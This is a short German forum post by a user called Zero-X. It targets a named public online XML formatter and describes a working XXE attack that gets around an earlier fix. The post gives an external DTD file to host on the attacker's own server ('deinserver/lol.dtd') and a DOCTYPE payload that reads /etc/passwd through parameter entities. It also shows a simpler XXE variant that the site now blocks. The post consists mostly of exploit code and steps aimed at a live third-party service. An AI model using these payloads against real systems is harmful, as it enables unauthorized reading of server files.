Keine Antworten in diesem Thema

[Zero-X]

Angreifbare URL:

http://www.freeformatter.com/xml-formatter.html

Zuerst laden wir diese Datei auf einen Server unserer Wahl:

lol.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM '%file;'>">
%all;

Dann geben wir im Feld "Option 1" folgendes ein:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://deinserver/lol.dtd">
%dtd;]>
<roottag>&send;</roottag>

Dann klicken wir auf "Format XML".

Auf der Seite ist zu lesen:
"A special thanks to Johannes Künsebeck for pointing out the XML Injection issue in my formatter!"

Anscheinend wurde in der Vergangenheit ein Versuch unternommen die Lücke zu schließen.
Dieser Code zeigt nämlich keine Dateien an:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>